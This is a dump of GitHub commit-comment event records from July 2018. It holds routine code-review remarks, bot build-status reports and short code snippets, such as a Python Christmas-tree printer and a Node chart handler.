{"id":"7929453240","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"kiffmejs/Create-react--app-jim-app-"},"payload":{"comment":{"id":29622729,"position":null,"line":null,"path":null,"commit_id":"c680f7f73ddc7f6f098d4334ba23341790afcfba","created_at":"2018-07-06T15:07:15Z","updated_at":"2018-07-06T15:07:15Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T15:07:15Z"}
{"id":"7929453965","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29622730,"position":18,"line":169,"path":"docs/chapters/rules.tex","commit_id":"f533df30fac00df79fa6a1885f07698a5e3a1d3b","created_at":"2018-07-06T15:07:25Z","updated_at":"2018-07-06T15:07:25Z","author_association":"OWNER","body":"Roger that!"}},"created_at":"2018-07-06T15:07:25Z"}
{"id":"7929454254","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"kiffmejs/Create-react--app-jim-app-"},"payload":{"comment":{"id":29622731,"position":null,"line":null,"path":null,"commit_id":"f5b69f12cdfa8c5807387bc94137c80339b6e570","created_at":"2018-07-06T15:07:29Z","updated_at":"2018-07-06T15:07:29Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:07:29Z"}
{"id":"7929455055","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29622733,"position":29,"line":25,"path":"client/containers/Login/LoginContainer.js","commit_id":"35909c38b1169c7ebb2f73438b1212a947a2da10","created_at":"2018-07-06T15:07:37Z","updated_at":"2018-07-06T15:07:37Z","author_association":"COLLABORATOR","body":"This should be an action, that name should be something like: 'login', plus you dont have to pass the state. You should use connect from redux to handle the state and dispatches."}},"created_at":"2018-07-06T15:07:37Z"}
{"id":"7929459375","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29622742,"position":3,"line":1,"path":"client/redux/constants.js","commit_id":"35909c38b1169c7ebb2f73438b1212a947a2da10","created_at":"2018-07-06T15:08:26Z","updated_at":"2018-07-06T15:08:26Z","author_association":"COLLABORATOR","body":"This should be in a config file, and should have a more descriptive name like AUTH_URL"}},"created_at":"2018-07-06T15:08:26Z"}
{"id":"7929459456","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"joeleve212/chatarang"},"payload":{"comment":{"id":29622743,"position":null,"line":null,"path":null,"commit_id":"b074b6baa7614f81cf2870a54b372ae983ee0933","created_at":"2018-07-06T15:08:27Z","updated_at":"2018-07-06T15:08:27Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T15:08:27Z"}
{"id":"7929460215","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"joeleve212/chatarang"},"payload":{"comment":{"id":29622746,"position":null,"line":null,"path":null,"commit_id":"62c8cc4082d2b49f5bbca3dcc95c0e4051c4315b","created_at":"2018-07-06T15:08:35Z","updated_at":"2018-07-06T15:08:35Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:08:35Z"}
{"id":"7929463048","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"joeleve212/chatarang"},"payload":{"comment":{"id":29622752,"position":null,"line":null,"path":null,"commit_id":"142762415003022d97ab4a4e7c1538877aab3357","created_at":"2018-07-06T15:09:08Z","updated_at":"2018-07-06T15:09:08Z","author_association":"NONE","body":"This commit is huge! Try to make smaller commits along the way with their own commit messages so they're easier to refer to in the future. Otherwise, good work."}},"created_at":"2018-07-06T15:09:08Z"}
{"id":"7929463659","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29622753,"position":4,"line":2,"path":"client/redux/constants.js","commit_id":"35909c38b1169c7ebb2f73438b1212a947a2da10","created_at":"2018-07-06T15:09:15Z","updated_at":"2018-07-06T15:09:15Z","author_association":"COLLABORATOR","body":"This should definitely be in a config, never store a secret key in the client side, thats a security leak"}},"created_at":"2018-07-06T15:09:15Z"}
{"id":"7929466076","type":"CommitCommentEvent","actor":{"login":"PiotrKurzawa"},"repo":{"name":"PiotrKurzawa/Christmas-Tree"},"payload":{"comment":{"id":29622757,"position":2,"line":2,"path":"README.md","commit_id":"f953ac470742f80a1d3cc92ca8f4231f01ff8203","created_at":"2018-07-06T15:09:42Z","updated_at":"2018-07-06T15:09:42Z","author_association":"OWNER","body":"def choinka():  #this program is drawing christmas tree\r\n  z = range(1, 12)\r\n  h = range(1, 7)\r\n  for j in h:\r\n    for x, y in enumerate(z):\r\n      if j>1 and j<6 and (x+y) <= 5*j and (x+y)>2*j:\r\n        print((len(z)-x)*' ', (x+y)*'*')\r\n      elif j==1 and (x+y) <= 5*j:\r\n        print((len(z)-x)*' ', (x+y)*'*')\r\n      elif j==6 and (x+y)<=5:\r\n        print((len(z)-1)*' ', 3*'*') #one christmas tree\r\n  print(26*'*')\r\nzagajnik = int(input(\"wprowadź liczbę: \")) #number of trees according to input\r\nfor t in range(zagajnik):\r\n  choinka()  "}},"created_at":"2018-07-06T15:09:42Z"}
{"id":"7929466825","type":"CommitCommentEvent","actor":{"login":"poidynets"},"repo":{"name":"poidynets/SITZOD--PoidynetsVasyl-MainProject"},"payload":{"comment":{"id":29622758,"position":null,"line":null,"path":null,"commit_id":"942eda656b3ba08f8bad60a3485e56e566e4b37f","created_at":"2018-07-06T15:09:51Z","updated_at":"2018-07-06T15:09:51Z","author_association":"OWNER","body":"unneeded project"}},"created_at":"2018-07-06T15:09:51Z"}
{"id":"7929467419","type":"CommitCommentEvent","actor":{"login":"systeme-cardinal"},"repo":{"name":"systeme-cardinal/node-Pyke"},"payload":{"comment":{"id":29622761,"position":4,"line":9,"path":"package.json","commit_id":"7f227c588b14a015ca82bb50ae51c186a8c14457","created_at":"2018-07-06T15:09:57Z","updated_at":"2018-07-06T15:09:57Z","author_association":"OWNER","body":"change reposit ans name"}},"created_at":"2018-07-06T15:09:57Z"}
{"id":"7929467931","type":"CommitCommentEvent","actor":{"login":"jslater89"},"repo":{"name":"jslater89/pendulum"},"payload":{"comment":{"id":29622764,"position":null,"line":null,"path":null,"commit_id":"7f7d0bdd7099711e75f1bb2f2ad3cc78fa87e7ec","created_at":"2018-07-06T15:10:03Z","updated_at":"2018-07-06T15:10:03Z","author_association":"OWNER","body":"@bralexc I'll be in touch."}},"created_at":"2018-07-06T15:10:03Z"}
{"id":"7929468093","type":"CommitCommentEvent","actor":{"login":"systeme-cardinal"},"repo":{"name":"systeme-cardinal/node-Pyke"},"payload":{"comment":{"id":29622765,"position":null,"line":null,"path":null,"commit_id":"7f227c588b14a015ca82bb50ae51c186a8c14457","created_at":"2018-07-06T15:10:05Z","updated_at":"2018-07-06T15:10:05Z","author_association":"OWNER","body":"new reposit"}},"created_at":"2018-07-06T15:10:05Z"}
{"id":"7929468460","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"MattMiles/chatarang"},"payload":{"comment":{"id":29622766,"position":null,"line":null,"path":null,"commit_id":"0068de6c73c1864e41327f6c2a449636f17d107e","created_at":"2018-07-06T15:10:09Z","updated_at":"2018-07-06T15:10:09Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T15:10:09Z"}
{"id":"7929469197","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29622767,"position":18,"line":169,"path":"docs/chapters/rules.tex","commit_id":"f533df30fac00df79fa6a1885f07698a5e3a1d3b","created_at":"2018-07-06T15:10:15Z","updated_at":"2018-07-06T15:10:15Z","author_association":"OWNER","body":"Updated. :wink: "}},"created_at":"2018-07-06T15:10:15Z"}
{"id":"7929469449","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"MattMiles/chatarang"},"payload":{"comment":{"id":29622769,"position":null,"line":null,"path":null,"commit_id":"1bb68143fda37c31669dbc9cec4cecc074cd4211","created_at":"2018-07-06T15:10:18Z","updated_at":"2018-07-06T15:10:18Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:10:18Z"}
{"id":"7929469712","type":"CommitCommentEvent","actor":{"login":"KJP12"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29622770,"position":null,"line":null,"path":null,"commit_id":"bdfd9522683dd13515de2fe1bcbd652e2359da1f","created_at":"2018-07-06T15:10:21Z","updated_at":"2018-07-06T15:10:21Z","author_association":"NONE","body":"Perfect use of deprecation before even using it"}},"created_at":"2018-07-06T15:10:21Z"}
{"id":"7929472596","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29622776,"position":4,"line":4,"path":"client/redux/loginReducer.js","commit_id":"35909c38b1169c7ebb2f73438b1212a947a2da10","created_at":"2018-07-06T15:10:51Z","updated_at":"2018-07-06T15:10:51Z","author_association":"COLLABORATOR","body":"jwt and secret should not be imported in the client side"}},"created_at":"2018-07-06T15:10:51Z"}
{"id":"7929473200","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"MattMiles/chatarang"},"payload":{"comment":{"id":29622778,"position":null,"line":null,"path":null,"commit_id":"26f5d5f0d9a77e761819172dd8a8a02e1d2c5d3f","created_at":"2018-07-06T15:10:58Z","updated_at":"2018-07-06T15:10:58Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:10:58Z"}
{"id":"7929474080","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"MattMiles/chatarang"},"payload":{"comment":{"id":29622779,"position":null,"line":null,"path":null,"commit_id":"278bb9ccaa8410ee7ea9e4695fb4289366fafcfa","created_at":"2018-07-06T15:11:09Z","updated_at":"2018-07-06T15:11:09Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:11:09Z"}
{"id":"7929474594","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29622781,"position":21,"line":10,"path":"client/redux/loginReducer.js","commit_id":"35909c38b1169c7ebb2f73438b1212a947a2da10","created_at":"2018-07-06T15:11:14Z","updated_at":"2018-07-06T15:11:14Z","author_association":"COLLABORATOR","body":"this validation should not be here"}},"created_at":"2018-07-06T15:11:14Z"}
{"id":"7929475434","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29622783,"position":null,"line":null,"path":null,"commit_id":"aae388b45b15dd61bf1a1356c58b08321deee879","created_at":"2018-07-06T15:11:24Z","updated_at":"2018-07-06T15:11:24Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - i386-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T15:11:24Z"}
{"id":"7929475496","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"MattMiles/chatarang"},"payload":{"comment":{"id":29622785,"position":null,"line":null,"path":null,"commit_id":"162b8407504fc41192fa09c85cf8c03a313c2379","created_at":"2018-07-06T15:11:24Z","updated_at":"2018-07-06T15:11:24Z","author_association":"NONE","body":"Good work."}},"created_at":"2018-07-06T15:11:24Z"}
{"id":"7929476587","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"MattMiles/chatarang"},"payload":{"comment":{"id":29622788,"position":null,"line":null,"path":null,"commit_id":"25333e119f3248d158db23f4d52705e7fcc12d41","created_at":"2018-07-06T15:11:36Z","updated_at":"2018-07-06T15:11:36Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:11:36Z"}
{"id":"7929477036","type":"CommitCommentEvent","actor":{"login":"lepon01"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29622789,"position":null,"line":null,"path":null,"commit_id":"bdfd9522683dd13515de2fe1bcbd652e2359da1f","created_at":"2018-07-06T15:11:41Z","updated_at":"2018-07-06T15:11:41Z","author_association":"MEMBER","body":"It's how you make open source code and having the ability to abandon it"}},"created_at":"2018-07-06T15:11:41Z"}
{"id":"7929479383","type":"CommitCommentEvent","actor":{"login":"p10shinde"},"repo":{"name":"p10shinde/random"},"payload":{"comment":{"id":29622794,"position":null,"line":null,"path":null,"commit_id":"bd4d8ed99ff5a97d11ad363e05246717c0ae24b9","created_at":"2018-07-06T15:12:08Z","updated_at":"2018-07-06T15:12:08Z","author_association":"OWNER","body":"exports.generateChart = async function(req, res){ \r\n\ttry { \r\n\t\tvar appName = req.query.appName; \r\n\t\tvar OBJ = req.body; \r\n \r\n\t\tvar cOBJ = {}; \r\n\t\tif (S(OBJ.title).contains('Sonar')) { \r\n\t\t\tcOBJ.type = \"Sonar\"; cOBJ.heading = OBJ.parent + \"-\" + OBJ.title; \r\n\t\t\tvar cARR = []; var tARR = []; for (let nEle of OBJ.chartData) { \r\n\t\t\t\tvar dtTm = moment(nEle.date).format('MMM DD, YY HH:MM:SS A'); \r\n\t\t\t\tvar nJSON = {}; nJSON[dtTm] = _.omit(nEle, 'date'); cARR.push(nJSON); \r\n\t\t\t\tnEle.date = dtTm; tARR.push(nEle); \r\n\t\t\t} \r\n\t\t\tcOBJ['CHART'] = cARR; cOBJ['TABLE'] = tARR; \r\n \r\n\t\t} else if (S(OBJ.parent).contains('Release')) { \r\n\t\t\t// Build Chart \r\n\t\t\tcOBJ.type = \"Build_Bar\"; cOBJ.heading = OBJ.parent + \"-\" + OBJ.title; \r\n\t\t\tvar ABORTED = _.where(OBJ.chartData, {\"result\": \"ABORTED\"}); \r\n\t\t\tvar SUCCESS = _.where(OBJ.chartData, {\"result\": \"SUCCESS\"}); \r\n\t\t\tvar FAILURE = _.where(OBJ.chartData, {\"result\": \"FAILURE\"}); \r\n\t\t\tcOBJ.CHART = {'success': SUCCESS.length, 'failure': FAILURE.length, 'aborted': ABORTED.length}; \r\n\t\t\tcOBJ.TABLE = [cOBJ.CHART]; \r\n\t\t} \r\n\t\tRPTutils.checkCollection(req, res, cOBJ); \r\n\t} catch (err) {  console.log(err); RPTutils.catchError(req, res, err, req.body); } \r\n};"}},"created_at":"2018-07-06T15:12:08Z"}
{"id":"7929479936","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29622795,"position":22,"line":11,"path":"client/redux/loginReducer.js","commit_id":"35909c38b1169c7ebb2f73438b1212a947a2da10","created_at":"2018-07-06T15:12:13Z","updated_at":"2018-07-06T15:12:13Z","author_association":"COLLABORATOR","body":"Dont use alerts, you should show a label in the login component"}},"created_at":"2018-07-06T15:12:13Z"}
{"id":"7929487932","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29622811,"position":26,"line":15,"path":"client/redux/loginReducer.js","commit_id":"35909c38b1169c7ebb2f73438b1212a947a2da10","created_at":"2018-07-06T15:13:45Z","updated_at":"2018-07-06T15:13:45Z","author_association":"COLLABORATOR","body":"This logic should be in a helper file: from line 15 to line 19 "}},"created_at":"2018-07-06T15:13:45Z"}
{"id":"7929489481","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29622817,"position":34,"line":22,"path":"client/redux/loginReducer.js","commit_id":"35909c38b1169c7ebb2f73438b1212a947a2da10","created_at":"2018-07-06T15:14:04Z","updated_at":"2018-07-06T15:14:04Z","author_association":"COLLABORATOR","body":"Never decode a token in client side"}},"created_at":"2018-07-06T15:14:04Z"}
{"id":"7929489619","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29622819,"position":174,"line":361,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T15:14:06Z","updated_at":"2018-07-06T15:14:06Z","author_association":"NONE","body":"This might be nicer: `(address instanceof Inet6Address)`"}},"created_at":"2018-07-06T15:14:06Z"}
{"id":"7929489975","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"troywiegand/chatarang"},"payload":{"comment":{"id":29622820,"position":null,"line":null,"path":null,"commit_id":"0c4f0bade8280b7214db41c965e8f8aa7cfddf67","created_at":"2018-07-06T15:14:10Z","updated_at":"2018-07-06T15:14:10Z","author_association":"NONE","body":"This is a pretty big commit. Try breaking it up and committing more often so you can go back and reference specific code in the future. Otherwise, good work! 👍 "}},"created_at":"2018-07-06T15:14:10Z"}
{"id":"7929490920","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29622821,"position":46,"line":28,"path":"client/redux/loginReducer.js","commit_id":"35909c38b1169c7ebb2f73438b1212a947a2da10","created_at":"2018-07-06T15:14:20Z","updated_at":"2018-07-06T15:14:20Z","author_association":"COLLABORATOR","body":"use template strings "}},"created_at":"2018-07-06T15:14:20Z"}
{"id":"7929491193","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"troywiegand/chatarang"},"payload":{"comment":{"id":29622822,"position":null,"line":null,"path":null,"commit_id":"350852cac6b6290b6744a4cadab2676b457b8c19","created_at":"2018-07-06T15:14:24Z","updated_at":"2018-07-06T15:14:24Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:14:24Z"}
{"id":"7929493912","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29622826,"position":45,"line":27,"path":"client/redux/loginReducer.js","commit_id":"35909c38b1169c7ebb2f73438b1212a947a2da10","created_at":"2018-07-06T15:14:57Z","updated_at":"2018-07-06T15:14:57Z","author_association":"COLLABORATOR","body":"Create an apiHelper to do the requests"}},"created_at":"2018-07-06T15:14:57Z"}
{"id":"7929493987","type":"CommitCommentEvent","actor":{"login":"KJP12"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29622827,"position":null,"line":null,"path":null,"commit_id":"bdfd9522683dd13515de2fe1bcbd652e2359da1f","created_at":"2018-07-06T15:14:58Z","updated_at":"2018-07-06T15:14:58Z","author_association":"NONE","body":"Yep. Tbh, if it's fresh or not going to be used as a library, I just kill it off right there and then without `@Deprecated` or anything to mark it's deprecated."}},"created_at":"2018-07-06T15:14:58Z"}
{"id":"7929495070","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"troywiegand/chatarang"},"payload":{"comment":{"id":29622830,"position":null,"line":null,"path":null,"commit_id":"73a584b23ef242463e7d6562b517aebccfdec5df","created_at":"2018-07-06T15:15:12Z","updated_at":"2018-07-06T15:15:12Z","author_association":"NONE","body":"👍 Good work."}},"created_at":"2018-07-06T15:15:12Z"}
{"id":"7929496866","type":"CommitCommentEvent","actor":{"login":"krypticallusion"},"repo":{"name":"shanutheflash/tgbot"},"payload":{"comment":{"id":29622834,"position":null,"line":null,"path":null,"commit_id":"3d647e00d7749e21b12ebcbdb31596a31c541e60","created_at":"2018-07-06T15:15:30Z","updated_at":"2018-07-06T15:15:30Z","author_association":"NONE","body":"Try to maintain authorship and don't commit on github."}},"created_at":"2018-07-06T15:15:30Z"}
{"id":"7929497890","type":"CommitCommentEvent","actor":{"login":"iloire"},"repo":{"name":"zzarcon/react-video-renderer"},"payload":{"comment":{"id":29622837,"position":153,"line":216,"path":"__tests__/index.tsx","commit_id":"a82c9fd88c748808553a5148afdd0cae3fe60ea3","created_at":"2018-07-06T15:15:42Z","updated_at":"2018-07-06T15:15:42Z","author_association":"COLLABORATOR","body":"oh, nice!"}},"created_at":"2018-07-06T15:15:42Z"}
{"id":"7929511433","type":"CommitCommentEvent","actor":{"login":"ggreif"},"repo":{"name":"ghc/ghc"},"payload":{"comment":{"id":29622852,"position":5,"line":122,"path":"compiler/iface/MkIface.hs","commit_id":"1d1e2b77fdc2babdf4fff72b9120c6831e7b422f","created_at":"2018-07-06T15:18:18Z","updated_at":"2018-07-06T15:18:18Z","author_association":"CONTRIBUTOR","body":"Should be `804`, see https://ghc.haskell.org/trac/ghc/ticket/14924"}},"created_at":"2018-07-06T15:18:18Z"}
{"id":"7929515282","type":"CommitCommentEvent","actor":{"login":"Zarquan"},"repo":{"name":"lsst-uk/qservtestbed"},"payload":{"comment":{"id":29622860,"position":null,"line":null,"path":null,"commit_id":"9231bec898b2e17596c78bd7ff027032cc422633","created_at":"2018-07-06T15:19:03Z","updated_at":"2018-07-06T15:19:03Z","author_association":"MEMBER","body":"Just curious - why did this one get removed?"}},"created_at":"2018-07-06T15:19:03Z"}
{"id":"7929516332","type":"CommitCommentEvent","actor":{"login":"563494644"},"repo":{"name":"563494644/test1"},"payload":{"comment":{"id":29622862,"position":null,"line":null,"path":null,"commit_id":"5397b139f2f61d4f0e60b4e82f81ba3bedf91501","created_at":"2018-07-06T15:19:16Z","updated_at":"2018-07-06T15:19:16Z","author_association":"OWNER","body":"sadfasdfds"}},"created_at":"2018-07-06T15:19:16Z"}
{"id":"7929517519","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29622864,"position":null,"line":null,"path":null,"commit_id":"11d3f513e2a6a287e09cdfe45b565de82d6ebe17","created_at":"2018-07-06T15:19:30Z","updated_at":"2018-07-06T15:19:30Z","author_association":"NONE","body":"HotFix-FailingHXUnitTest (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11d3f513e2a6a287e09cdfe45b565de82d6ebe17-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11d3f513e2a6a287e09cdfe45b565de82d6ebe17-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11d3f513e2a6a287e09cdfe45b565de82d6ebe17-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-06T15:19:30Z"}
{"id":"7929518838","type":"CommitCommentEvent","actor":{"login":"chrismccord"},"repo":{"name":"phoenixframework/phoenix"},"payload":{"comment":{"id":29622866,"position":null,"line":null,"path":null,"commit_id":"b2938d6eac7dd3aec202fefcc0778b9de4096011","created_at":"2018-07-06T15:19:47Z","updated_at":"2018-07-06T15:19:47Z","author_association":"MEMBER","body":"The default arg spanning two different tests was a little harder to follow, so I added a new function :)"}},"created_at":"2018-07-06T15:19:47Z"}
{"id":"7929524503","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29622877,"position":null,"line":null,"path":null,"commit_id":"11d3f513e2a6a287e09cdfe45b565de82d6ebe17","created_at":"2018-07-06T15:20:53Z","updated_at":"2018-07-06T15:20:53Z","author_association":"NONE","body":"HotFix-FailingHXUnitTest (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11d3f513e2a6a287e09cdfe45b565de82d6ebe17-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T15:20:53Z"}
{"id":"7929531744","type":"CommitCommentEvent","actor":{"login":"superseb"},"repo":{"name":"chrisurwin/docs"},"payload":{"comment":{"id":29622887,"position":64,"line":64,"path":"content/rancher/v2.x/en/quick-start-guide/workload/quickstart-deploy-workload-ingress/_index.md","commit_id":"f966c24546554bd5d75c23dfca4215f15111d83d","created_at":"2018-07-06T15:22:18Z","updated_at":"2018-07-06T15:22:18Z","author_association":"NONE","body":"This will default to `xip.io` and will be populated, this can take a few minutes."}},"created_at":"2018-07-06T15:22:18Z"}
{"id":"7929536922","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"jaythras/Chaterang"},"payload":{"comment":{"id":29622898,"position":null,"line":null,"path":null,"commit_id":"9f9a69b688e1fa25ff9e9b6a843e83efa3ae3e7f","created_at":"2018-07-06T15:23:22Z","updated_at":"2018-07-06T15:23:22Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T15:23:22Z"}
{"id":"7929537365","type":"CommitCommentEvent","actor":{"login":"dborstelmann"},"repo":{"name":"SlalomSTLHealthcare/healthcare-web"},"payload":{"comment":{"id":29622899,"position":null,"line":null,"path":null,"commit_id":"50950f72ccc6845f1b0f44b5f565b84379bc9d96","created_at":"2018-07-06T15:23:28Z","updated_at":"2018-07-06T15:23:28Z","author_association":"CONTRIBUTOR","body":"👍"}},"created_at":"2018-07-06T15:23:28Z"}
{"id":"7929537999","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"jaythras/Chaterang"},"payload":{"comment":{"id":29622900,"position":null,"line":null,"path":null,"commit_id":"e93706b07f7bbefc6e705e16e8ae5a460a785917","created_at":"2018-07-06T15:23:36Z","updated_at":"2018-07-06T15:23:36Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:23:36Z"}
{"id":"7929539176","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"jaythras/Chaterang"},"payload":{"comment":{"id":29622903,"position":null,"line":null,"path":null,"commit_id":"c6473ce0ccd74260bc94a11f6bef3b6dfdb35f14","created_at":"2018-07-06T15:23:49Z","updated_at":"2018-07-06T15:23:49Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:23:49Z"}
{"id":"7929540069","type":"CommitCommentEvent","actor":{"login":"superseb"},"repo":{"name":"chrisurwin/docs"},"payload":{"comment":{"id":29622908,"position":144,"line":144,"path":"content/rancher/v2.x/en/quick-start-guide/workload/quickstart-deploy-workload-nodeport/_index.md","commit_id":"f966c24546554bd5d75c23dfca4215f15111d83d","created_at":"2018-07-06T15:24:01Z","updated_at":"2018-07-06T15:24:01Z","author_association":"NONE","body":"NodePort"}},"created_at":"2018-07-06T15:24:01Z"}
{"id":"7929562615","type":"CommitCommentEvent","actor":{"login":"whitedragon0000"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29622965,"position":17,"line":119,"path":"engine/wii/wiiport.c","commit_id":"a1e86d3cee2bff2512c6e896e4b123abb70a0a98","created_at":"2018-07-06T15:28:32Z","updated_at":"2018-07-06T15:28:32Z","author_association":"COLLABORATOR","body":"ops.. I will remove these rows..."}},"created_at":"2018-07-06T15:28:32Z"}
{"id":"7929562819","type":"CommitCommentEvent","actor":{"login":"simon-brooke"},"repo":{"name":"LightTable/LightTable"},"payload":{"comment":{"id":29622966,"position":null,"line":null,"path":null,"commit_id":"f18ab2183b11dd79e52475853344322403c2429d","created_at":"2018-07-06T15:28:34Z","updated_at":"2018-07-06T15:28:34Z","author_association":"NONE","body":"So, what precisely are you looking for? I'm a long term LightTable user, but I'll admit I'm beginning to fall out of love with it. It has the potential to be really, really good, but just at present it isn't delivering for me on that."}},"created_at":"2018-07-06T15:28:34Z"}
{"id":"7929563253","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29622968,"position":null,"line":null,"path":null,"commit_id":"2744de6c0927799ab1bda5c0414f2ce60a5ded54","created_at":"2018-07-06T15:28:39Z","updated_at":"2018-07-06T15:28:39Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-06T15:28:39Z"}
{"id":"7929565650","type":"CommitCommentEvent","actor":{"login":"vilchik-elena"},"repo":{"name":"SonarSource/slang"},"payload":{"comment":{"id":29622974,"position":52,"line":61,"path":"slang-api/src/test/java/com/sonarsource/slang/impl/JumpTreeImplTest.java","commit_id":"5775a6dded2dffa905b1475a99a10eb3eb2d49e7","created_at":"2018-07-06T15:29:05Z","updated_at":"2018-07-06T15:29:05Z","author_association":"CONTRIBUTOR","body":"should we test equivalence of jump with and without label?"}},"created_at":"2018-07-06T15:29:05Z"}
{"id":"7929567468","type":"CommitCommentEvent","actor":{"login":"vilchik-elena"},"repo":{"name":"SonarSource/slang"},"payload":{"comment":{"id":29622976,"position":3,"line":34,"path":"slang-api/src/test/java/com/sonarsource/slang/impl/ReturnTreeImplTest.java","commit_id":"5775a6dded2dffa905b1475a99a10eb3eb2d49e7","created_at":"2018-07-06T15:29:27Z","updated_at":"2018-07-06T15:29:27Z","author_association":"CONTRIBUTOR","body":"text range here is also too short"}},"created_at":"2018-07-06T15:29:27Z"}
